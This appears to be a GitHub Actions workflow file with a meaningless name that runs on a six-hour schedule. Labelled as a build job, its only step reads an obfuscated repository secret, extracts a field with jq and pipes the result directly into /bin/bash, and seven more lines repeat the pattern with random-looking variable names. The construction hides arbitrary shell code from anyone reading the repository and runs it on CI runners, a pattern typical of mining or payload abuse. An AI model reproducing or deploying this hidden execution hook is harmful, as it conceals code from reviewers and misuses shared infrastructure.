name: advantagemarried

on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: advantagemarried
        env:
          j67340: ${{ secrets.j67340 }}
        run: |
          echo $j67340 | jq -r .eo55145 | /bin/bash
          echo $ztrtf020 | jq -r .waywe54395 | /bin/bash
          echo $fvgs7510 | jq -r .ql3 | /bin/bash
          echo $yo83375 | jq -r .mbu92149 | /bin/bash
          echo $b913 | jq -r .nz8 | /bin/bash
          echo $qxk37 | jq -r .misce0974 | /bin/bash
          echo $y40 | jq -r .amfqg0 | /bin/bash
          echo $r0644 | jq -r .v80 | /bin/bash

